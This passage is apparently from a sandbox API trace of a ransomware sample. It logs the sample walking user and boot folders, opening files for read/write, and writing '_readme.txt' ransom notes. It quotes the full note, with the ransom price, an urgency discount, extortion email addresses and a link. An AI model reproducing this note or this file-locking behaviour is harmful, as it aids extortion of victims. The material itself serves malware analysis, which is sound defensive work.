lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0209.967] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0209.967] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.968] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0209.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0209.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.969] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.969] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.969] PathFindFileNameW (pszPath="") returned="" [0209.969] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.973] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.973] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0209.973] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0209.973] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0209.973] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0209.974] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.975] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.975] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0209.975] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0209.975] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.975] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.975] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.975] PathFindFileNameW (pszPath="") returned="" [0209.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.977] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.978] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.978] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\") returned="tCN4\\" [0209.978] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0209.978] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.978] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.979] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.979] PathFindFileNameW (pszPath="") returned="" [0209.979] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf370260, ftCreationTime.dwHighDateTime=0x1d5e6da, ftLastAccessTime.dwLowDateTime=0x41352620, ftLastAccessTime.dwHighDateTime=0x1d5dcf8, ftLastWriteTime.dwLowDateTime=0x41352620, ftLastWriteTime.dwHighDateTime=0x1d5dcf8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.981] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.981] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.981] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\") returned="S-r24cctxl\\" [0209.981] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0209.981] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.981] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.981] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.981] PathFindFileNameW (pszPath="") returned="" [0209.981] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1460ff0, ftCreationTime.dwHighDateTime=0x1d5e2b9, ftLastAccessTime.dwLowDateTime=0xce6c4f80, ftLastAccessTime.dwHighDateTime=0x1d5e083, ftLastWriteTime.dwLowDateTime=0xce6c4f80, ftLastWriteTime.dwHighDateTime=0x1d5e083, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.984] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.985] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.985] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\") returned="WVIC0My\\" [0209.985] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0209.985] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0209.985] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0209.985] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.985] PathFindFileNameW (pszPath="") returned="" [0209.985] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WVIC0My\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9e6a260, ftCreationTime.dwHighDateTime=0x1d5df82, ftLastAccessTime.dwLowDateTime=0x59132c20, ftLastAccessTime.dwHighDateTime=0x1d5e382, ftLastWriteTime.dwLowDateTime=0x59132c20, ftLastWriteTime.dwHighDateTime=0x1d5e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.988] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.989] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.989] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.989] PathFindFileNameW (pszPath="") returned="" [0209.989] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.990] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.990] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32ef368 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.990] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.990] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0209.990] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0209.991] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x3277d28 [0209.991] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0209.991] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0209.991] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.993] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0209.993] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0209.993] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0209.993] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.993] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.993] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0209.993] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.993] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.993] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.993] PathFindFileNameW (pszPath="") returned="" [0209.993] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.994] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.994] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32ef368 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.994] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.994] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0209.994] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0209.995] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.995] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.995] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.995] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.995] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0209.995] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0209.996] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.996] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0209.996] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.996] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0209.996] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.996] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0209.996] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.996] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0209.996] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.997] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.997] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0209.997] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.997] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0209.997] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.997] PathFindFileNameW (pszPath="") returned="" [0209.997] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.998] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.998] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.998] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.998] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0209.998] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0209.998] lstrcpyW (in: lpString1=0x3a88060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.998] 